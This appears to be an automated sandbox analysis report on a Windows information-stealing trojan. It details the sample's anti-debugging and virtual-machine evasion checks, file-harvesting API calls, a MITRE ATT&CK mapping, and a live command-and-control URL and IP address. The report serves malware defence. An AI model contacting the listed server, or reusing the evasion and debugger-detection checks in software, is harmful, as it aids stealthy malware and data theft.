              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8251 second address: 9F8288 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979465342h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jl 00007FD979465367h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD979465347h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8288 second address: 9F82FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9790E7D64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FD9790E7D58h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 and dl, FFFFFFE8h 0x00000027 push dword ptr [ebp+122D1D5Ch] 0x0000002d jmp 00007FD9790E7D5Ah 0x00000032 add edx, 714F8C65h 0x00000038 call 00007FD9790E7D59h 0x0000003d jmp 00007FD9790E7D60h 0x00000042 push eax 0x00000043 jc 00007FD9790E7D64h 0x00000049 push eax 0x0000004a push edx 0x0000004b push edi 0x0000004c pop edi 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F82FC second address: 9F8314 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD979465336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007FD979465338h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8314 second address: 9F835E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9790E7D67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jnc 00007FD9790E7D6Eh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jc 00007FD9790E7D60h 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9831 second address: 9F9837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9837 second address: 9F983B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F983B second address: 9F983F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507029A second address: 50702E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FD9790E7D67h 0x0000000b xor cx, 1B6Eh 0x00000010 jmp 00007FD9790E7D69h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD9790E7D5Dh 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50702E9 second address: 507032E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 pushfd 0x00000006 jmp 00007FD979465343h 0x0000000b or si, E62Eh 0x00000010 jmp 00007FD979465349h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c mov ebx, ecx 0x0000001e pushad 0x0000001f push esi 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507038F second address: 50703D1 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD9790E7D5Dh 0x00000008 sbb esi, 7BD59286h 0x0000000e jmp 00007FD9790E7D61h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FD9790E7D5Eh 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703D1 second address: 50703D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703D5 second address: 50703DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703DB second address: 50703E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703E1 second address: 50703E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 912841 second address: 91284A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 75F71D instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 75F84F instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 90E5DC instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 992E36 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decision graph_0-27146
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005218A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005218A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00523910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00523910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00521250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00521250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00521269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00521269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0052E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00524B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00524B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00524B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00524B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0052CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00522390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00522390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0051DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0051DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005223A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_005223A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0052D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0052DD30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005116B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005116A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00531BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess
Source: file.exe, file.exe, 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2082518165.0000000001202000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWl.
Source: file.exe, 00000000.00000002.2082518165.0000000001202000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082518165.00000000011D4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2082518165.000000000118E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, file.exe, 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25847)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25822)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25958)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25803)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25950)
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00514A60 VirtualProtect 00000000,00000004,00000100,?
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00536390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00536390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00532A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 5296, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00534610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005346A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: {Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00532D60 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00532B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00532A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00532C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

              Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2040482339.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2082518165.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5296, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2040482339.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2082518165.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5296, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix

Techniques with at least one mapped signature, by tactic (the number in parentheses is how many report signatures map to the technique; the matrix's remaining cells are unmatched placeholder techniques and are not listed here):

Execution: Command and Scripting Interpreter (2), Native API (12)
Persistence: Create Account (1), DLL Side-Loading (1)
Privilege Escalation: Process Injection (11), DLL Side-Loading (1)
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12)
Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration, Impact: no mapped signatures
Antivirus detection (sample):
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches (the report's three further antivirus tables are empty)

Antivirus detection (URLs):
Source | Detection | Scanner | Label
http://185.215.113.206/c4becf79229cb002.php/K | 100% | Avira URL Cloud | malware
http://185.215.113.206Z | 0% | Avira URL Cloud | safe

No contacted domains info

Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high

URLs from memory and binary strings:
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000000.00000002.2082518165.00000000011E7000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php? | file.exe, 00000000.00000002.2082518165.00000000011E7000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php/K | file.exe, 00000000.00000002.2082518165.00000000011E7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.2082518165.000000000118E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206Z | file.exe, 00000000.00000002.2082518165.000000000118E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

The trailing "/K" and "Z" on two of the memory-string URLs are adjacent bytes picked up by string extraction, not part of the C2 URL; the HTTP session in the network section shows the paths actually requested ("/" and "/c4becf79229cb002.php"), so pivot on those rather than on the suffixed variants.

Contacted IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1561529
                        Start date and time:2024-11-23 16:53:07 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 2s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:2
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 18
                        • Number of non-executed functions: 125
                        Cookbook Comments:
